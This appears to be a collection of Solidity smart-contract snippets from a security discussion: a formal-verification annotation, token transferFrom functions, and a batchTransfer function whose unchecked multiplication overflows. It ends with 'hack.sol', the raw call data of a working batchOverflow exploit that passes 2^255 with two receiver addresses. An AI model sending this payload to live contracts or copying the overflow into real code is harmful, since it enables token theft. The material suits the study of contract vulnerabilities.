View icx.js
/*@CTK FAIL "OnlyOnwersWalletAllowedToEnableTokenTransfer"
@pre tokenTransfer == false
@pre msg.sender != walletAddress
@post __post.tokenTransfer == false
*/
/* Visit https://certik.org to learn more */
function enableTokenTransfer()
external
onlyFromWallet {
tokenTransfer = true;
View edu.js
pragma solidity ^0.4.18;
interface tokenRecipient { function receiveApproval(address _from, uint256 _value, address _token, bytes _extraData) public; }
contract Token {
/// total amount of tokens
uint256 public totalSupply;
View transferFrom.js
function transferFrom(address _from, address _to, uint256 _value) public returns (bool success) {
/// same as above
require(_to != address(0x0));
require(balances[_from] >= _value);
require(balances[_to] + _value > balances[_to]);
uint previousBalances = balances[_from] + balances[_to];
balances[_from] -= _value;
balances[_to] += _value;
View transferFrom.js
function transferFrom(address _from, address _to, uint256 _value) public returns (bool success) {
/// same as above
require(_to != 0x0);
require(balances[_from] >= _value);
require(balances[_to] + _value > balances[_to]);
uint previousBalances = balances[_from] + balances[_to];
balances[_from] -= _value;
balances[_to] += _value;
View batchTransfer.js
function batchTransfer(address[] _receivers, uint256 _value) public returns (bool) {
uint cnt = _receivers.length;
// Total number tokens withdrawn from the sender.
uint256 amount = uint256(cnt) * _value;
require(cnt > 0 && cnt <= 20);
// Check if the sender can afford it.
require(_value > 0 && balances[msg.sender] >= amount);
// Withdraw the amount from sender.
balances[msg.sender] = balances[msg.sender].sub(amount);
View hack.sol
Function: batchTransfer(address[] _receivers, uint256 _value)
MethodID: 0x83f12fec
[0]: 0x0000000000000000000000000000000000000000000000000000000000000040
[1]: 0x8000000000000000000000000000000000000000000000000000000000000000 // 2^255
[2]: 0x0000000000000000000000000000000000000000000000000000000000000002 // array length
[3]: 0x000000000000000000000000b4d30cac5124b46c2df0cf3e3e1be05f42119033 // address 1
[4]: 0x0000000000000000000000000e823ffe018727585eaf5bc769fa80472f76c3d7 // address 2